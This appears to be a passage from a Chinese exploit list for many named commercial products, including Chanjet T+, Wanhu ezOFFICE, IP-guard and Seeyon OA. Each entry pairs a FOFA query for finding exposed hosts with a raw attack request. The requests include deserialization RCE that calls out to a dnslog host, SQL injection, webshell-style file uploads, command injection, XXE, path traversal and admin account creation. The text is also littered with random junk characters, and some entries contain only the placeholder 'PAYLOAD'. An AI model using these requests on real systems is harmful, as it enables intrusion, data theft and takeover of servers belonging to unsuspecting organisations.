3 w6 n& Z) Q' H6 v* c2 H0 v56. 畅捷通T+ RRATableController,Ufida.T.DI.UIP.ashx 反序列化RCE3 v5 U; L3 Q3 g% h
FOFA: app="畅捷通-TPlus"" |# g% G Z: T. v( a: b
POST /tplus/ajaxpro/Ufida.T.DI.UIP.RRA.RRATableController,Ufida.T.DI.UIP.ashx?method=GetStoreWarehouseByStore HTTP/1.1. |2 p& s) @8 x1 C, y @" r
Host: x.x.x.x
3 d9 f1 W7 l0 h7 c, y6 W2 Y$ yUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36/ j& T: q2 ~6 q7 n
Content-Type: application/json
% }* |# L# }# t6 O9 d
W2 E0 R+ N. L* B% r8 `{4 A$ q0 T0 X+ D3 i- |
"storeID":{
+ g0 y% `/ B) f4 w: k9 @ "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
4 b' u. _0 i* a c. } "MethodName":"Start",
. P( `: S) b6 @8 u "ObjectInstance":{
- A. u4 e- F: L "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",8 M6 ~. P! o6 P, Y; [" f* n
"StartInfo": {5 W" @6 b- v: U9 L$ c1 _1 j
"__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
! Q" p! Z$ c- f3 p3 h! a "FileName":"cmd", "Arguments":"/c ping 6qevyvmi.dnslog.pw"+ \1 B$ v# W, `$ C$ t+ U7 G3 w
}
% f8 _' v" t3 d+ B7 _0 K C }
* @- V* o& W+ r9 |+ t }
( p* I. M3 g( b8 I1 ~; d}
2 R0 `3 ?" Z" k) o5 X0 @' J) X4 M: N* S# `: q
& h2 l% l* }) G7 w; |4 p" {
57. 畅捷通T+ keyEdit.aspx SQL注入
i: H2 t* X9 N. s$ }7 L6 _FOFA:app="畅捷通-TPlus" H# _4 e A- s( _# G/ T
GET /tplus/UFAQD/keyEdit.aspx?KeyID=1%27%20and%201=(select%20@@version)%20--&preload=1 HTTP/1.1
( r) B; g! l! n$ M7 k6 S* dHost: host" J6 B1 Y# a4 d" w4 I
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36+ {. }9 E- j6 ^6 i, H- _
Accept-Charset: utf-86 [6 l0 A( g& @* Y5 g1 M9 n
Accept-Encoding: gzip, deflate
9 A6 S) ], `" D g& ~3 x2 EConnection: close
+ I0 P" y# g. ]2 {; \1 X* o7 P- x, k* W6 K: u( G
& h. e$ p/ T* d* i6 c
58. 畅捷通T+ KeyInfoList.aspx sql注入: a1 i4 }- ]7 r1 X) y/ I
FOFA:app="畅捷通-TPlus"
% m) L+ t+ F* r: u( QGET /tplus/UFAQD/KeyInfoList.aspx?preload=1&zt=')AND+1+IN+(SELECT+sys.fn_varbintohexstr(hashbytes('MD5','123456')))--+ HTTP/1.1
" D) K: O: l! K% dHost: your-ip! R( U# z; ?2 w8 T
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
' x% E9 l2 G; N+ o$ S8 T* x t' MAccept-Charset: utf-8
3 v: K1 r) t* d2 s, VAccept-Encoding: gzip, deflate
$ M1 F6 k, f' h: ] V4 `$ c8 nConnection: close
% f4 S3 @1 \ [2 S1 O$ ^/ O) o. a' ]& V4 w. h- W, R
3 t/ N( I# t. m; t& r
59. XETUX 软件 dynamiccontent.properties.xhtml 远程代码执行* H! j0 m7 M6 c- A! s! c( k
FOFA: title="@XETUX" && title="XPOS" && body="BackEnd"- z2 I3 n: K) v A6 H
POST /xc-one-pos/javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1' D" H) f) ^. v9 \/ P5 Y
Host: 192.168.86.128:9090
$ P3 J; [4 q/ C9 DUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
- ~" ]& M! ` C, i6 }6 Q0 ~% N$ {0 _Connection: close) c7 z% v, T- X) b! P/ J: r
Content-Length: 1669
5 E+ b& V1 \8 sAccept: */*5 v3 s4 M' p; o' M" `0 K5 ~2 o
Accept-Language: en
+ A$ [9 [8 w9 p' ]# qContent-Type: application/x-www-form-urlencoded' Z9 w" p5 q0 X7 a
Accept-Encoding: gzip
6 i. h1 T7 J5 }: u1 O0 X. j% E$ v8 ]$ i, K3 `/ ~/ R
PAYLOAD
+ {6 Y, A, [$ z: w" T! f& i- Q3 q
$ d' e. _1 ]1 l9 a* O" o; [8 P) |5 x' n* o2 q& t0 @
60. 百卓Smart管理平台 importexport.php SQL注入
# @" D. H; f0 W; c4 X3 Y0 P+ n _FOFA:title="Smart管理平台"
/ g5 F( H0 w# mGET /importexport.php?sql=c2VsZWN0IDEsdXNlcigpLDM=&type=exportexcelbysql HTTP/1.1 S0 d1 @7 b4 b) T# G3 a
Host:+ i) D* Q6 g+ d( I E- Q8 Z
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.368 R/ t: t! z- S2 {; b% e4 g1 W% H7 h
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
- o2 @0 W' \8 IAccept-Encoding: gzip, deflate: E- ~! G% R, w9 d
Accept-Language: zh-CN,zh;q=0.9: m- s! d: s, A- B/ B
Connection: close: G$ l7 U" U7 X8 h( q% [( o$ T
& ^ t# ^$ ?! F( q
3 @* l3 Q- v2 B. P: |. \61. 浙大恩特客户资源管理系统 fileupload 任意文件上传
! A- ~5 u4 o% w& {0 Y+ H. H+ @' v. uFOFA: title="欢迎使用浙大恩特客户资源管理系统"
+ f' C' k. o* D: K- V4 y4 j2 xPOST /entsoft_en/entereditor/jsp/fileupload.jsp?filename=8uxssX66eqrqtKObcVa0kid98xa.jsp HTTP/1.1
/ f1 n' Q* X5 s7 Q; Z% A8 {) FHost: x.x.x.x
7 u5 q9 H% A+ \9 n9 k8 LUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15/ U# f1 |( h5 J$ x* f
Connection: close v I1 K1 C& B( B1 W2 a. k) ?( L
Content-Length: 276 q; b2 U; `$ ~* F" g
Accept: */*
( t7 D5 n! {' L. l2 {% pAccept-Encoding: gzip, deflate
7 O9 e, s/ E; d& ~9 l7 v3 eAccept-Language: en
7 ?4 X O8 L8 K4 x7 X8 W6 eContent-Type: application/x-www-form-urlencoded
; H8 h+ U) i! C, K
- x9 r# U; f5 c. J8uxssX66eqrqtKObcVa0kid98xa* @* r( Z) D( \ h
1 N( t' j4 t9 m c) ^: z
: k/ V" @( s0 l
62. IP-guard WebServer 远程命令执行: L8 ]: m9 @+ X$ U& Q
FOFA:"IP-guard" && icon_hash="2030860561". l% O5 P* F* A5 g1 K5 Z6 g( D9 f
GET /ipg/static/appr/lib/flexpaper/php/view.php?doc=11.jpg&format=swf&isSplit=true&page=||echo+"09kdujzKJDLinkQTLfGzMMKDJ23HJ"+>09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
: _2 ]; R$ Y1 o8 l6 g) DHost: x.x.x.x
) J- W$ B" {. V1 K+ h4 a7 fUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.368 w% b! k" V z2 ~$ N8 o; }
Connection: close
1 L( z' G# H' V& |2 [- |2 B9 IAccept: */*! R0 w& I4 r6 w- D8 C( q) d
Accept-Language: en
$ n" D/ b) Y9 aAccept-Encoding: gzip
5 p, q2 U$ \1 P: g6 g# H
" z: k( c: x' {" P
+ p' n. `/ u+ Y+ i2 W+ z访问) c! p K/ q/ D* @
8 i V; K- c" `! @, W' y0 H+ J0 sGET /ipg/static/appr/lib/flexpaper/php/09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1: I0 c, D8 W h" f! ^# {
Host: x.x.x.x
+ w; @/ C! u% M9 F8 ~. e1 N) c7 b, H. Y% ], G/ q! ~7 i/ J
6 _, b% C$ b* a5 c
63. IP-guard WebServer任意文件读取7 g1 |" H5 u4 c
IP-guard < 4.82.0609.0
0 ~2 M3 y' o2 Y6 DFOFA:icon_hash="2030860561"
( m- A3 H' a3 C- x, E4 {POST /ipg/appr/MApplyList/downloadFile_client/getdatarecord HTTP/1.15 ~' s2 p5 b: \, F5 ?
Host: your-ip
2 j$ Y0 \; g4 u% H" l6 g. vUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
0 K/ M. i7 K+ z+ Y3 bAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 H% H* l6 R; R* Q$ V8 e3 f
Accept-Encoding: gzip, deflate8 u, q8 M4 ]3 @
Accept-Language: zh-CN,zh;q=0.9
! _8 ~& r7 L1 v$ t7 ?0 nConnection: close
" ?" n0 _' M% c/ rContent-Type: application/x-www-form-urlencoded. X% I) |' i* ]) R# L; @; r
; ~4 X* [) S/ ~% ]path=..%2Fconfig.ini&filename=1&action=download&hidGuid=1v%0D%0A$ x) p, R. ~# ]# {
, i' _+ p+ L$ O) z! a64. 捷诚管理信息系统CWSFinanceCommon SQL注入5 |# c& {, F9 e! [4 f" S) }
FOFA:body="/Scripts/EnjoyMsg.js"
p# q& Z( [ @, B# x: jPOST /EnjoyRMIS_WS/WS/APS/CWSFinanceCommon.asmx HTTP/1.1, r& `! k, }; a, m
Host: 192.168.86.128:90012 `8 }1 B# z/ v% M
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
( M: }& M9 y9 X- HConnection: close
( n3 T% h& u- tContent-Length: 3695 L X5 E2 k3 o
Accept: */*9 G# H5 U4 d7 B" k: A* e" E' }; q% L
Accept-Language: en
3 E& [7 |1 M) o7 D4 `Content-Type: text/xml; charset=utf-8 h( |8 c; N8 @, r; z: K+ k$ h
Accept-Encoding: gzip
" F2 d6 Z: f& v$ a- H7 ~. A/ ?4 |8 y& O
<?xml version="1.0" encoding="utf-8"?>
3 @$ i( ?- w8 L9 _. i<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">" D+ V/ d9 \: C) @
<soap:Body>4 f% G- a' H* R; b' Y: u2 ~
<GetOSpById xmlns="http://tempuri.org/">& T# [: i: Z, @& h$ E' \
<sId>1';waitfor delay '0:0:5'--+</sId>
5 j# i' d$ N. H5 I/ N" K </GetOSpById>/ j3 I! X1 D, f0 o$ o' F
</soap:Body>5 ]0 }7 S* F: I' C9 H" D' E8 ?/ y
</soap:Envelope>% `9 M8 t$ p1 K, I
' v7 l. \3 o+ E9 m* ~5 X# o
- Y s* I% Z! T" ^. K65. 优卡特脸爱云一脸通智慧管理平台1.0.55.0.0.1权限绕过5 m( a9 E! T6 S2 {* P7 R( l, i
FOFA:title="欢迎使用脸爱云 一脸通智慧管理平台"
: ]/ z) a" l+ ~0 e$ p$ j响应200即成功创建账号test123456/123456
. c3 [% j& U# W9 {- IPOST /SystemMng.ashx HTTP/1.1: _7 W) `) r. E, p! p
Host:
# G- ^' F. v9 z" d/ gUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)+ K) _3 V) o% \7 L
Accept-Encoding: gzip, deflate
0 K& j3 ^) }; y5 s) v! N. d5 XAccept: */* y9 D$ G+ n G% y5 J/ S3 p
Connection: close
2 X5 Z7 T5 c' q! m5 W: D4 GAccept-Language: en
) n- n" H# ?$ n3 q) oContent-Length: 174
8 D+ O1 K" |/ t; i2 @8 I/ I) C+ h0 ^8 h K& M4 \. a
operatorName=test123456&operatorPwd=123456&operpassword=123456&operatorRole=00&visible_jh=%E8%AF%B7%E9%80%89%E6%8B%A9&visible_dorm=%E8%AF%B7%E9%80%89%E6%8B%A9&funcName=addOperators+ M% K: Y: T q3 C" g d/ z
2 e3 z' k$ M4 D7 Z4 ~8 I {
4 X$ Z% o H6 g8 ]! ]
66. 万户ezOFFICE协同管理平台SendFileCheckTemplateEdit-SQL注入& |8 n) C2 B# q% x2 J: q# ~# z
FOFA:app="万户ezOFFICE协同管理平台"7 M* n5 K6 X$ ]2 [/ ~) k9 `3 G- [
: P( y Q. g8 w1 _GET /defaultroot/public/iWebOfficeSign/Template/SendFileCheckTemplateEdit.jsp?RecordID=1'%20UNION%20ALL%20SELECT%20sys.fn_sqlvarbasetostr(HashBytes(%27MD5%27,%27102103122%27))%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL-- HTTP/1.1
( V* d9 E6 Z( h0 y: HHost: x.x.x.x
. t" ?+ T8 l0 @User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36* a2 T# D" [, p9 W' d
Connection: close
1 o J" b* T L, NAccept: */*4 u# {# n2 T1 e% E) M$ o7 }
Accept-Language: en) K$ R: M Q1 ?2 ~' U
Accept-Encoding: gzip; u6 y- L) F" m1 M6 [. n8 T
8 x( N; `& ?: `& F: i. T5 F7 l, A9 C% ]0 ~1 Q" c0 d
第42,43行包含6cfe798ba8e5b85feb50164c59f4bec9字符串证明漏洞存在: W/ u$ \2 l2 O$ l" r* v
- m4 A4 X2 p5 |4 Y9 A3 b67. 万户ezOFFICE wpsservlet任意文件上传0 p. E& j0 i. W1 w, P
FOFA:app="万户网络-ezOFFICE"
! r+ H" M+ H9 E8 anewdocId和filename参数表示写入文件名称,dir参数表示写入文件的路径,fileType参数表示文件类型2 ?# J D7 | W$ h* L/ K
POST /defaultroot/wpsservlet?option=saveNewFile&newdocId=apoxkq&dir=../platform/portal/layout/&fileType=.jsp HTTP/1.1
+ J) z: f/ R) V* M: w8 kHost: x.x.x.x
5 ]' G% K6 Q" h( ]8 V0 j4 ^User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
6 }! p& j' I$ ]1 S9 QContent-Length: 1739 E% x; X# Y( ~5 X- l
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8+ L3 T9 F/ i) u) L, W
Accept-Encoding: gzip, deflate( ], |& h$ R" ^
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3$ k2 |4 ], @: u: e% c' r% y) R
Connection: close) j& n- h. I& K' m, {
Content-Type: multipart/form-data; boundary=ufuadpxathqvxfqnuyuqaozvseiueerp: |% {3 h9 Y* D% J/ ~# S
DNT: 1
! l6 c3 W& h# v& g' y- ]Upgrade-Insecure-Requests: 1' `8 E; R, u3 I% t8 U3 l
9 j4 h" _5 b* A8 d% q# {
--ufuadpxathqvxfqnuyuqaozvseiueerp. B5 @& I6 }# k, b# }
Content-Disposition: form-data; name="NewFile"; filename="apoxkq.jsp"0 w5 q* r0 R X; D; c% S& k
1 O9 h' I j9 B& t2 k
<% out.print("sasdfghjkj");%>
+ O7 y% @& V; r8 |. l--ufuadpxathqvxfqnuyuqaozvseiueerp--- u, G4 {6 p1 F7 ?; @2 E* b7 @
( d6 u; K; z8 M/ I8 X2 o% N2 r( }% R! u7 J1 g
文件回显路径为/defaultroot/platform/portal/layout/apoxkq.jsp! W; t- ?' p3 M b( b ]3 D
0 s7 [* ^1 q3 V4 l' j
68. 万户ezOFFICE wf_printnum.jsp SQL注入
" W, Z- E4 Z6 GFOFA:app="万户ezOFFICE协同管理平台"
* s; w. S. W3 [% v- c( YGET /defaultroot/platform/bpm/work_flow/operate/wf_printnum.jsp;.js?recordId=1;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
( i' {4 M4 e2 D/ WHost: {{host}}% A; E4 `6 ]! q2 z, s1 t
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36
2 s% V0 e1 L1 R# `( k0 wAccept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.80 F% r8 D4 g- h5 X8 l! g
Accept-Encoding: gzip, deflate
6 n n( p& A. O1 o! D1 L% HAccept-Language: zh-CN,zh;q=0.9
, N) D- J& L! `1 b |) NConnection: close+ q! y( q' G9 a
1 i6 Z, y& ^# G' W! X
& \6 W) Q, C5 @) q( X/ r; C69. 万户 ezOFFICE contract_gd.jsp SQL注入. x* n+ z8 {, P) r) V+ H" [
FOFA:app="万户ezOFFICE协同管理平台"' ?' h/ w( ?' J7 ^1 y/ ^
GET /defaultroot/modules/subsidiary/contract/contract_gd.jsp;.js?gd=1&gd_startUserCode=1%27%3Bwaitfor%20delay%20%270%3A0%3A5%27-- HTTP/1.1
- M2 l# x V" G3 u J q" cHost: your-ip
1 y9 N! d( S, z! ^5 aUser-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
5 Y) c2 G% y8 h( l8 T: M1 \/ kAccept-Encoding: gzip, deflate, ]# T3 b' k/ o+ e
Accept: */*
/ K3 _, O% a: e3 s: m: }0 C: ?Connection: keep-alive
5 w$ L3 v5 @ w% ~; a7 f* q/ P# ^+ m0 H( C/ f& P
8 a" H7 j3 E; b# [* o, w7 O7 B
70. 万户ezEIP success 命令执行
% ~2 A9 L" h, V0 t. _8 k* tFOFA:app="万户网络-ezEIP"
3 S& h; e/ W! ~; j. v. nPOST /member/success.aspx HTTP/1.1! W7 C5 Z5 ]% p. L# S
Host: {{Hostname}}
k, B7 N. x+ ?' OUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.367 z$ ^, I5 e- `- [
SID: dHlwZSBDOlxXaW5kb3dzXHdpbi5pbmk=
; H3 J# R( |4 h- l/ h8 p) P9 ~Content-Type: application/x-www-form-urlencoded
( R J. n% M+ L/ H, I7 ^8 \TYPE: C0 a" }/ D9 Q( v2 l
Content-Length: 167024 ~( x7 T+ P* O2 M
# Q6 H/ Y$ r% w) S
__VIEWSTATE=PAYLOAD& F" d1 I+ k3 @8 x: f. k8 F! n
$ V* K/ O% [- A9 g9 H- a( U0 s5 Z% \6 J- f* e0 w+ u
71. 邦永PM2项目管理系统 Global_UserLogin.aspx SQL注入
( R0 c! {7 ]2 ? F- U. GFOFA:body="PM2项目管理系统BS版增强工具.zip"
+ B, y1 U: s: |- uGET /Global/Global_UserLogin.aspx?accId=1%27%3BWAITFOR+DELAY+%270%3A0%3A5%27--&loginCode&password&type HTTP/1.1
' j' @# y: D1 Z- |Host: x.x.x.xx.x.x.x5 A \& p' q7 l; W2 Y p
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
7 K+ Y* G2 V& @" NConnection: close
' h" E4 Q+ F J! |Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
& ~5 e$ H+ ^8 f) ?# B' U- }Accept-Encoding: gzip, deflate- n( F# T% z9 w% h2 S- A9 D. U
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
) [+ ~7 H( z, TUpgrade-Insecure-Requests: 1
: h* g' c5 ~% |: h0 b6 P6 E! c* t* S0 b- I
; t8 |- k9 O5 `# {( ^3 u
72. 致远OA getAjaxDataServlet XXE
2 @. L8 i. {, e# d0 B" `, pFOFA:app="致远互联-OA"
1 |# Q2 z3 O/ w% vPOST /seeyon/m-signature/RunSignature/run/getAjaxDataServlet HTTP/1.1! Z* n7 g) q r4 B
Host: 192.168.40.131:8099
9 H( S7 m9 Y) }) m. _" rUser-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36( z: d. l9 [+ o- u; j( d+ G
Connection: close0 P* Y* ~+ b6 X- N
Content-Length: 583
7 N, I& |9 ~! S1 F, a9 M4 d3 I: [ FContent-Type: application/x-www-form-urlencoded
/ R8 M' d! A- }+ u$ ~* G- YAccept-Encoding: gzip, \. }! e1 ]) h, i2 }+ ?
& P$ q/ U5 D, @' _4 I0 ?" TS=ajaxColManager&M=colDelLock&imgvalue=lr7V9+0XCEhZ5KUijesavRASMmpz%2FJcFgNqW4G2x63IPfOy%3DYudDQ1bnHT8BLtwokmb%2Fk&signwidth=4.0&signheight=4.0&xmlValue=%3C%3Fxml+version%3D%221.0%22%3F%3E%0D%0A%3C%21DOCTYPE+foo+%5B%0D%0A++%3C%21ELEMENT+foo+ANY+%3E%0D%0A++%3C%21ENTITY+xxe+SYSTEM+%22file%3A%2F%2F%2Fc%3A%2Fwindows%2Fwin.ini%22+%3E%0D%0A%55D%3E%0D%0A%3CSignature%3E%3CField%3E%3Ca+Index%3D%22ProtectItem%22%3Etrue%3C%2Fa%3E%3Cb+Index%3D%22Caption%22%3Ecaption%3C%2Fb%3E%3Cc+Index%3D%22ID%22%3Eid%3C%2Fc%3E%3Cdd+Index%3D%22VALUE%22%3E%26xxe%3B%3C%2Fd%3E%3C%2FField%3E%3C%2FSignature%3E
3 x! r* |$ Q) G% Y4 X
4 G/ J/ j5 @5 E* f T6 S% _4 N1 u! ?; a" W P0 e2 T- ]
73. GeoServer wms远程代码执行0 o4 D8 o. D# Q$ G
FOFA:icon_hash=”97540678”
. a) \" z: y- u% N8 @& X. uPOST /geoserver/wms HTTP/1.17 B: ]) X8 r- S8 B
Host:1 @/ W* t7 M1 t
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
. w8 v" m) G& b1 wContent-Length: 1981
% w1 o# }# f) {5 y: R8 M4 tAccept-Encoding: gzip, deflate) B# W/ p% }; u: t3 A; q: X1 d
Connection: close
6 R K0 y$ c& s& \9 S& aContent-Type: application/xml
& k( G3 B% G4 g. }SL-CE-SUID: 35 C# i9 f& e8 B8 k+ `8 \! m* i! Y
& y4 |( {8 b' N5 [PAYLOAD
6 w3 j: c: `3 E% E$ t6 ]% I( F
( u& m8 a/ q1 O& d5 F% L) j: d- U
74. 致远M3-server 6_1sp1 反序列化RCE
9 v/ c! n' m* T0 W( {% EFOFA:title="M3-Server"
4 n% O( O! F7 k: X+ G( l( yPAYLOAD
0 l# ]$ I8 `1 ]0 H0 Z. {8 f! Z5 O8 @; C" o: G
75. Telesquare TLR-2005Ksh 路由器 admin.cgi RCE
' X/ C; a1 z2 c* _: H9 ?FOFA:app="TELESQUARE-TLR-2005KSH"
2 u9 K1 Y! k _6 \$ F* F8 ]& Y2 k9 A6 TGET /cgi-bin/admin.cgi?Command=setSyncTimeHost&time=`ifconfig>test28256.txt` HTTP/1.1
; j9 Q! U) x% i) m4 p' `Host: x.x.x.x
$ `- S' ~/ c, [User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
6 {/ ~) i5 L ~4 Z I @Connection: close, N- }$ c3 V0 B9 C9 u0 L0 ~# h% ?
Accept: */*8 \- D# m$ Z! b" n+ B' K
Accept-Language: en5 S7 f/ U- _+ Z+ [$ A
Accept-Encoding: gzip2 i% U( i$ }& P" N0 s
6 |) H* a5 Q$ E- ]/ K( K! M7 w3 }
GET /cgi-bin/test28256.txt HTTP/1.1) u' b- g" ^ q
Host: x.x.x.x
7 n1 K% v2 d# H- s# w Q) h% S
# L" t; w" n) a& i" y) ?# q! E1 W3 |; x+ k3 X0 p
76. 新开普掌上校园服务管理平台service.action远程命令执行3 P0 @0 ?7 {' M- E, ]
FOFA:title="掌上校园服务管理平台"2 P$ r. F1 H" M. ]9 Q
POST /service_transport/service.action HTTP/1.1
! d+ V% p5 Y5 e6 b. i& A, T EHost: x.x.x.x c, Y. M g. e. h# ?
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
4 o2 N5 Y' ^, E# w: u- jConnection: close0 }* r: L$ _8 Y, N
Content-Length: 211/ j6 N* @. p3 z4 A
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
& C- @4 C+ p" Q9 X1 @Accept-Encoding: gzip, deflate# o( B! z+ |6 {6 ^3 _# x b
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2* U2 C3 J+ `7 {. L+ l
Cookie: JSESSIONID=6A13B163B0FA9A5F8FE53D4153AC13A4
+ x g) S9 N, n- c7 [Upgrade-Insecure-Requests: 1
4 s4 m4 K3 ~' c* C! ?# b3 m. F9 {6 J; I U' Y
{
; B9 ?* n* V, c1 B0 d"command": "GetFZinfo",* O, u6 |6 N. A! t- k
"UnitCode": "<#assign ex = \"freemarker.template.utility.Execute\"2 c8 p9 y2 a" Q; A J" g# H
?new()>${ex(\"cmd /c echo 9d8ajikdujw8ejd9wjdfkfu8 >./webapps/ROOT/9d8ajikdujw8ejd9wjdfkfu8.txt\")}"4 @! J ]7 o' a
}! W+ r# w: d0 ^* ~) p8 z' F& }/ c( O& p
; A" }+ Z$ K: @" g- Q0 ]+ h
' Y! Q9 W0 E3 e0 q
GET /9d8ajikdujw8ejd9wjdfkfu8.txt HTTP/1.1
9 u j3 h9 z0 v+ lHost: x.x.x.x& e/ w8 x, m( j( y. `; r- ~
4 S( X3 o0 Z- w) b/ |' E
4 w" g( I8 Z3 v: m' N/ |+ T- p; U$ m, C' a* b8 @
77. F22服装管理软件系统UploadHandler.ashx任意文件上传
1 o4 ^, g A+ C* K4 x. `" gFOFA:body="F22WEB登陆"
! ]$ O2 ?4 }( m* e5 L) oPOST /CuteSoft_Client/UploadHandler.ashx HTTP/1.1( `$ E' T E6 M: s0 Z3 W
Host: x.x.x.x
1 K" n! M& H X6 l/ i" G& PUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.368 v, [7 H2 b+ I+ `! W8 O" `, o
Connection: close
8 e3 e1 ~: `& d% C3 A: x5 eContent-Length: 433
! R; E9 h# Z4 Z$ G9 O" K; N5 XAccept: */*3 }3 B8 d3 V* Q0 \; S" Q
Accept-Encoding: gzip, deflate# j1 u' d4 }+ Z8 _: }7 g3 G
Accept-Language: zh-CN,zh;q=0.9
6 u" i* r! `8 o* @# R( s4 dContent-Type: multipart/form-data; boundary=----------398jnjVTTlDVXHlE7yYnfwBoix. H- e1 @3 }$ B* h4 s& K
& y9 ?0 w9 w: {) Q$ a& m/ O
------------398jnjVTTlDVXHlE7yYnfwBoix; l. k4 @1 O% x: }" L1 N" ~
Content-Disposition: form-data; name="folder"1 ?/ t5 I9 r3 \; o2 k2 x8 Y/ D; n
" ?7 p2 b0 l1 ?3 a* C5 L& A/upload/udplog
% d) [" F% w( Q1 M T# `------------398jnjVTTlDVXHlE7yYnfwBoix4 @3 J0 Y" i( o% I$ P: d. r
Content-Disposition: form-data; name="Filedata"; filename="1.aspx"8 U6 W+ I/ {( v4 v3 _: K3 J
Content-Type: application/octet-stream
# h' E+ I$ l0 }, y9 w1 j f+ ?) f& f4 G
hello1234567
! c" H$ m9 V. c7 S" z------------398jnjVTTlDVXHlE7yYnfwBoix) v4 H6 d/ ?" \) p7 P) w/ e
Content-Disposition: form-data; name="Upload"# S, p6 D6 k1 x2 t2 u
+ b0 [3 E% I6 `6 F/ Z) w5 G
Submit Query
: l2 E$ r4 a8 z- j------------398jnjVTTlDVXHlE7yYnfwBoix--/ ]1 R) s+ T- z& h1 b
7 V# C7 ]( x* T6 I7 S) c- u
! e4 ?) o& l) Z* W1 W78. pkpmbs 建设工程质量监督系统 FileUpload.ashx 文件上传
2 [( [3 \- i. f' V M' Z9 r$ XFOFA:icon_hash="2001627082"! O4 \6 N% F! J h1 d; f# {" P
POST /Platform/System/FileUpload.ashx HTTP/1.13 N: h, Z' o3 }. d" V ]
Host: x.x.x.x) Z( Q8 R+ ~8 S
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
: L3 h$ t' Z4 `, yConnection: close
4 [ V2 e5 s4 } r5 C5 u" ?+ WContent-Length: 336
3 v. n% X" J7 \Accept-Encoding: gzip: G4 W7 u, q5 E. C
Content-Type: multipart/form-data; boundary=----YsOxWxSvj1KyZow1PTsh98fdu6l K7 i# `7 @! @% J
+ v$ Y/ o3 `; l3 a( I& Z
------YsOxWxSvj1KyZow1PTsh98fdu6l
